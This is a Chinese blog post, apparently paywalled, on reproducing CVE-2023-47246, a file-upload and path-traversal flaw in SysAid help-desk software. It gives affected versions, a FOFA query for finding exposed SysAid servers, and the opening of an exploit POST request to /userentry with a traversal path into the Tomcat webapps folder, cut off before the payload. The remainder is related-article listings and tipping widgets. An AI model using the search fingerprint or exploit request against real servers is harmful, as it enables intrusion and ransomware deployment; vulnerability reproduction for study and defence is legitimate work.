SysAid userentry 文件上传漏洞复现(CVE-2023-47246)

最新推荐文章于 2024-07-24 21:07:42 发布
最新推荐文章于 2024-07-24 21:07:42 发布
阅读量1k 收藏 8
点赞数 9
分类专栏: 漏洞复现 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/135044643
版权

0x01 产品简介

SysAid 是一种信息技术(IT)服务管理和帮助台解决方案,旨在帮助组织更有效地管理其IT基础设施、服务台支持和用户需求。SysAid 提供了一系列的功能,包括故障报告、资产管理、问题管理、变更管理、知识库、自动化工作流程等,以帮助企业提高IT服务的效率和质量。

0x02 漏洞概述

SysAid 在 userentry 存在文件上传漏洞,攻击者可以利用文件上传漏洞执行恶意代码、写入后门、读取敏感文件,从而可能导致服务器受到攻击并被控制。

0x03 影响范围

SysAid version < 23.3.36

0x04 复现环境

FOFA:

body="sysaid-logo-dark-green.png" || title="SysAid Help Desk Software" || body="Help Desk software <a href=\"http://www.sysaid.com\">by SysAid</a>"

0x05 漏洞复现 

Exp

POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 9
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
sysaid-module:Sysaiud 的快速入门 Java 模块
07-06
将银行配置添加到 tomcat 上下文文件 在生产 tomcat 中,必须在 server.xml 文件中进行配置 在项目的persistence.xml文件中,检查方言配置是否设置正确: 将文件夹“NOME_PROJETO”以及在其 iframe 中调用此模块...
漏洞复现--SysAid On-premise远程代码执行(CVE-2023-47246)
qq_53003652的博客
12-18 976
SysAid On-premise 提供了诸如故障报告、资产管理、服务台支持、自动化流程等功能,以帮助 IT 团队更高效地工作。这种部署模式可以满足那些对数据安全性有更高要求的组织,同时也提供了更多的自定义和控制能力,以适应特定的业务需求和流程。该产品存在远程代码执行。
sysaid的安装
zhaofei_001的专栏
12-14 1760
sysaid是大名鼎鼎的helpdesk,ITIL管理工具,免费版可以使用最多2个管理员,100个用户,100个资产。一般来说对于小型的公司部门,可以满足需求。 最新版8.1的是有中文版的,在安装的时候可以选择。选择下载windows版的,XP或者2003都可以安装使用。 安装完之后会有个简单的设置过程。 安装结束后,在开始菜单中运行登录即可。 设置方面,主要是在偏好设置,Helpdesk
SysAid 9.0 发布,增加移动设备管理功能
weixin_34068198的博客
11-09 130
SysAid 9.0 提供新的移动设备管理功能,可让管理员控制所有的移动设备,并集成进了资产管理;提供了新的知识库 UI 设计和双屏远程控制。此外 SysAid 的 ITIL 得到了PinkVERIFY™v3.1认证。 SysAid 是一款用于IT(技术信息)组织部门的软件.该软件提供了管理助手,自动地扫描组织的网络并且列出其拥有的计算机. SysAid 按照每台计算机提供详细的资料(它的硬件...
微软称 SysAid IT 支持软件 0day 遭利用
smellycat000的专栏
11-10 109
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士微软称威胁组织 Lace Tempest 利用SysAid IT 支持软件中的一个0day 发动数量有限的攻击活动。Lace Tempest 因分发 CI0p勒索软件而为人所知,此前曾利用 MOVEit 和 PaperCut 服务器中的 0day。这次该组织利用的 0day 是路径遍历漏洞CVE-2023-47246,可导致在本地版本实现代码执行...
网络安全日报 2023年11月13日
Galaxy_0的博客
11-13 235
SysAid是一款IT服务管理(ITSM)解决方案,为组织内管理各种IT服务提供了一套工具。研究人员发现,攻击者正在利用服务管理软件SysAid中的零日漏洞来访问企业服务器,进行数据窃取并部署Clop勒索软件。该漏洞于11月2日被发现,被标记为CVE-2023-47246,黑客利用该漏洞入侵SysAid服务器。研究人员确定该漏洞正在被Lace Tempest(又称Fin11和TA505)组织利用,用于部署Clop勒索软件。
漏洞分析 | 漏洞调试的捷径:精简代码加速分析与利用
m0_46699477的博客
11-16 255
本文为了便于调试能够快速复现漏洞CVE-2023-47246),尝试通过只使用部分的单元代码来模拟漏洞的主要逻辑流程进行动态调试分析。最终,成功利用 Goby 工具完美地实现了该漏洞的利用。
漏洞复现CVE-2023-46747 F5-BIG-IP 远程代码执行漏洞
NicolasZQ的博客
11-02 700
漏洞复现CVE-2023-46747 F5-BIG-IP 远程代码执行漏洞
wufoo-connector-camel:使用Apache Camel将Wufoo表单提交映射到其他系统(SysAid等)的中间件
05-26
成功完成Wufoo表单后,Wufoo / SysAid Connector将使用从WuFoo表单接收到的信息在SysAid中创建服务请求。 集成使用Wufoo的webhook将WuFoo表单提交的请求发送给apache骆驼侦听器。 Camel侦听器通过Camel Jetty组件...
2022-2028全球与中国帮助台软件市场现状及未来发展趋势
01-12
全球帮助台软件市场的关键参与者包括SysAid、Klemen Stirn、Zendesk、Salesforce.com和Live Agent (Quality Unit)等。2019年,这五家企业占据了约47%的市场份额,其中Salesforce.com凭借超过16%的全球市场份额处于...
support_ticket2:Linux 支持票
06-28
HESK Help Desk 软件免费版: HESK 的赞助商 SysAid 提供一体化 IT 帮助台和资产管理软件, 其中包括一组集成的基本功能,用于:自动化帮助台管理, 在一个平台上监控资产并管理所有 IT 任务。 如果您打算将其与您...
微软蓝屏事件引发对构建更加稳固和安全的网络环境的思考
lupai的博客
07-24 433
综上所述,构建更加稳固和安全的网络环境需要政府、企业和用户共同努力,从政策、技术、用户行为等多个方面入手,形成全方位、多层次的网络安全防护体系。构建更加稳固和安全的网络环境是一个系统工程,需要从多个方面入手,包括政策、技术、用户行为等多个层面。建立完善的应急响应机制,制定应急预案和演练计划,提高应对网络攻击和突发事件的能力。鼓励和支持网络安全技术的研发和创新,推动新技术在网络安全领域的应用和推广。加强对用户的网络安全教育,提高用户的网络安全意识和防范能力。
网络战时代的国家安全:策略、技术和国际合作
2301_79955948的博客
07-24 1080
网络战时代的国家安全涉及到策略、技术和国际合作等多个方面。
大坝安全监测设备有哪些主要功能?
yyth13276363312的博客
07-24 317
12。3. **实时预警和报警处理**:提供精准的安全预警信息,及时处理可能的危险情况12。1. **实时监测大坝的各项物理参数**:包括应变、位移、水位、流量等12。6. **环境量监测**:包括上/下游水位、气温、降水量等11
内网安全:IPC横向
8888的博客
07-23 694
IPC是为了实现进程之间的通信而开放的管道。IPC可以通过验证用户名和密码来获取相应的权限。通过IPC可以与目标机器建立连接。
HDShredder 7 企业版案例分享: 依照国际权威标准,安全清除企业数据
sanyuan7783的博客
07-24 1140
符合国际权威标准软件操作符合多种主流国际权威标准,包括 DoD 5200, BSI, VSITR, NCSC, NIST 及 GOST,支持擦除单个分区和区域,并可自由定制擦除模式。对于“Clear”清除级别,软件操作符合 ISO 27001, DIN 66399 以及 NIST SP 800-88R1要求。对于“Purge”级别,则使用 SecureErase 功能。安全擦除证书软件生成准确的安全清除证书,包括时间戳、序列号、以及清除过程的所有细节信息。远程擦除 - 使用 NetDisk 技术。
深入探讨:如何在Shopee平台上安全运营多个店铺?
Ssm2022的博客
07-24 596
因为每个IP相关信息会被收录形成独特的浏览器指纹,浏览器指纹是一种通过收集和识别用户浏览器特征来跟踪和识别用户的技术。在跨境电商中,特别是运营多个店铺的商家,浏览器指纹可能被电商平台用于判断账号之间的关联。所以,当Shopee检测到一IP多店铺时,会认为商家存在恶意倾销等行为,从而封禁你的账号。这是一个关乎账号安全和业务持续性的重要问题。浏览器保存的账号、密码、支付信息等数据,以及注册资料、法人信息的重复使用,也可能导致账号被关联。通过这些措施,卖家可以有效降低店铺被关联的风险,保障业务的持续和稳定发展。
充电桩浪涌保护方案—保障充电设施安全稳定运行的关键
最新发布
Leiditech_的博客
07-24 902
大功率TVS二极管则以其极快的响应速度(纳秒级)和精准的电压钳位能力,对残余的浪涌进行进一步抑制,确保后端电路的安全。然而,由于其复杂的电气环境和暴露于户外的特点,充电桩容易受到浪涌的影响。浪涌可能来自雷电、电网故障、大功率设备的启停等,对充电桩的电子设备和储能系统造成严重损害。它具有超强的浪涌吸收能力和抑制电压能力,在实际应用中通常并接在电路中,既能解决雷击大浪涌问题,又能对静电起到超强的防护效果。3. 设备启停:大功率设备(如电动机、变压器等)的启动和停止会引起线路中的电流和电压突变,产生浪涌。
S-HTTP协议:确保网络通信安全的重要基石
jiamisoft的博客
07-23 649
S-HTTP,全称为Secure Hypertext Transfer Protocol,是一种安全的超文本传输协议,最早于1994年提出,并在1995年正式发布。作为HTTP(Hypertext Transfer Protocol)的一个扩展,S-HTTP旨在通过网络通信提供加密和认证机制,确保数据传输过程中的安全性和完整性。每个S-HTTP文件都经过加密处理,或者包含数字验证,甚至两者兼备,这一特性使得S-HTTP成为需要高安全性数据传输场景下的理想选择。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值